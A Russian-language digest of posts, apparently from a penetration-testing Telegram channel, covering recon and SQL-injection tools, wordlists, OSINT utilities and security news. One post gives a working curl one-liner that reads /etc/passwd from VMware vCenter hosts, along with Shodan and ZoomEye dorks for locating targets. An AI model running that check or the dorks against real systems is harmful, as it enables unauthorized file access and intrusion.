🔎 reconFTW — Комбайн для этичного хакера, который автоматизирует весь процесс разведки.

Он различными способами брутит поддомены (пассивный способ, перебор, перестановки, certificate transparency, парсинг исходного кода, аналитика, DNS-записи) и тестирует цели на подверженность различным уязвимостям. В конечном итоге вы получаете максимальный объем информации об исследуемых ресурсах.

🗄 Ссылка на репозиторий

#BugBounty #Pentest #Recon

📖 Свежий список периодически обновляемых DNS-резолверов

Резолверы играют крайне важную роль в DNS. DNS-резолвер кэширует информацию. К примеру, сайт example.com расположен на машине с IP-адресом 35.195.226.230. Поэтому кэши резолверов со всего мира будут содержать следующее соответствие: example.com→35.195.226.230.

Такие инструменты, как например, masscan, nuclei и т.д. позволяют использовать пользовательский список резолверов.

Используя широкий и актуальный список, мы расширяем возможности нашей разведки и имеем больший диапазон для тестирования сайта.

💬 Ссылка на GitHub

#Web #DNS

🟦 LFI, SSRF и XSS в VMware vCenter

В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.

Для поиска уязвимых хостов можно использовать однострочник:

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Дорк, который можно использовать для поиска в Shodan:

http.noscript:"ID_VC_Welcome"

Для поиска в Zoomeye:

app:"VMware vCenter"

#LFI #SSRF #XSS

🔍 ghauri — инструмент для автоматизации обнаружения и эксплуатации SQL-инъекций.

Усовершенствованный кроссплатформенный инструмент, который автоматизирует процесс обнаружения и использования уязвимостей безопасности SQL-инъекций.

🗄 Ссылка на репозиторий

#Tools #BugBounty #Pentest

⌨️ Продвинутые специализации в сфере ИБ | ИНФОБЕЗДНА

В этом видео мы с вами разберем остальные специализации, которые существуют в ИБ.

Вы узнаете кто такие фиолетовая, зеленая, желтая, оранжевая и белая команды, а также узнаете какие специалисты входят в эти направления и что они делают.

🗄 Смотреть на YouTube

#Cybersecurity #Video

⚫️ Что такое XXE Injection? PortSwigger

Внедрение внешнего объекта XML (XXE) — не самая распространенная, но зачастую критическая уязвимость. Она позволяет вмешиваться в обработку XML-данных веб-приложением.

Знаете ли вы, что кроме извлечения файлов, XXE можно использовать для выполнения SSRF-атак, скрытой эксфильтрации данных и извлечения данных с помощью сообщений об ошибках.

🗄 Подробнее

#XXE

🔄 Веб-службы на нестандартных портах

Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.

Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:

httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result

#Web #Recon

⚫ Полезные списки слов для брутфорса

Небольшая подборка полезных генераторов и списков слов с GitHub:

💬 https://github.com/danielmiessler/SecLists
💬 https://github.com/berzerk0/Probable-Wordlists
💬 https://github.com/govolution/betterdefaultpasslist
💬 https://github.com/insidetrust/statistically-likely-usernames
💬 https://github.com/LandGrey/pydictor
💬 https://github.com/sc0tfree/mentalist
💬 https://github.com/skahwah/wordsmith
💬 https://github.com/1N3/IntruderPayloads
💬 https://github.com/fuzzdb-project/fuzzdb
💬 https://github.com/Bo0oM/fuzz.txt
💬 https://github.com/laconicwolf/Password-Scripts
💬 https://github.com/FlameOfIgnis/Pwdb-Public

#Web #Wordlist

❤‍🔥 Умер Кевин Митник, самый известный хакер в мире

16 июля 2023 года скончался Кевин Митник, бывший хакер, который когда-то был одним из самых разыскиваемых компьютерных преступников в Соединенных Штатах.

Об этом в среду сообщили компания по обучению кибербезопасности, которую он соосновал. Ему было 59 лет.

#news

📖 passphrase-wordlist

Этот проект включает в себя огромный список фраз для брута сложных паролей (более 20 миллионов) и два файла правил #hashcat. Правила создадут более 1000 вариантов каждой фазы.

🗄 Ссылка на репозиторий

#soft #infosec

✈️ Мессенджер Telegram начал собирать IP-адреса пользователей, у которых нет премиум-подписки

Администрация Telegram проинформировала пользователей об обновлении рекламной политики. Уточняется, что за счет собранных IP-адресов пользователей, которые не оформили премиум-подписку, будет осуществляться таргетинг рекламы.

Отмечается, что сбор пользовательских IP-адресов позволит рекламодателям демонстрировать объявления в определенных странах и населенных пунктах. В администрации мессенджера подчеркнули, что никакая другая геолокационная информация пользователей для этих целей не собирается и не используется.

Отдельно администрация мессенджера Telegram заявила, что соответствующие изменения коснутся исключительно тех пользователей, которые не оформили премиум-подписку. Поэтому любые данные, в том числе IP-адреса, у пользователей с имеющейся подпиской собираться не будут.

#news

📚 Легендарная серия книг, которые переведены на русский язык:

• Занимайся хакингом как легенда.
• Занимайся хакингом с ловкостью Бога.
• Занимайся хакингом с ловкостью порнозвезды.
• Занимайся расследованием киберпреступлений как рок-звезда.

#ru #infosec #pentest

Обратный поиск по электронной почте

Epieos — это поисковая система, которая позволяет выполнять обратный поиск по электронной почте, находить похожие в Google и видеть, какие веб-сайты связаны с каким-либо адресом электронной почты.

💬 Ссылка на инструмент

#OSINT #email

👁 В Японии городские камеры с ИИ будут предотвращать преступления до их совершения

Камеры с ИИ будут находить людей с подозрительным повадками в поведении: частое оглядывание вокруг, «бегающий» взгляд и тд. Также камеры «увидят» оружие.

Заявляется, что их будут использовать только для защиты высокопоставленных VIP-персон

#news

📨 Tosint (Telegram OSINT)

— Инструмент для извлечения информации из телеграмм-ботов и связанных с ними каналов.

Возможности:
• Получение информации о боте (имя, имя пользователя,
идентификатор пользователя, статус);
• Получение информации о чате (название, тип,
идентификатор, имя пользователя, пригласительная ссылка);
• Создание пригласительной ссылки;
• Получение обновлений (последние сообщения, отправленные в чат);
• Получение количества пользователей в чате;
• Получение информации об администраторах чата.

💬 Ссылка на GitHub

#OSINT #infosec #Telegram

⚫️ Уязвимость CVE-2023-23397: комплексный анализ образцов первичной атаки.

14 марта 2023 года компания Microsoft опубликовала в своем блоге пост о критической уязвимости в Outlook (9,8 баллов по системе CVSS), позволяющей повысить привилегии пользователя.

• Пост вызвал бурную реакцию в кругах ИБ-экспертов, серых хакеров и злоумышленников, а также породил множество публикаций и твитов о CVE-2023-23397 и эксплойтах к ней.

— В этой статье мы рассмотрим ключевые особенности этой уязвимости и разберемся, как ее эксплуатировали киберпреступники до появления вышеупомянутой публикации.

💬 Ссылка на отчёт уязвимости

#Report #infosec #pentest

🔬 Бесплатные лаборатории для практики эксплуатации SSRF

В списке представлены онлайн лаборатории и те, которые вы можете поднять на собственной тестовой среде.

💬 PortSwigger SSRF Labs
💬 Server-Side Request Forgery (SSRF) vulnerable Lab
💬 Vulnado SSRF Lab
💬 Snyk SSRF Lab
💬 Kontra SSRF Lab

#Web #SSRF #pentest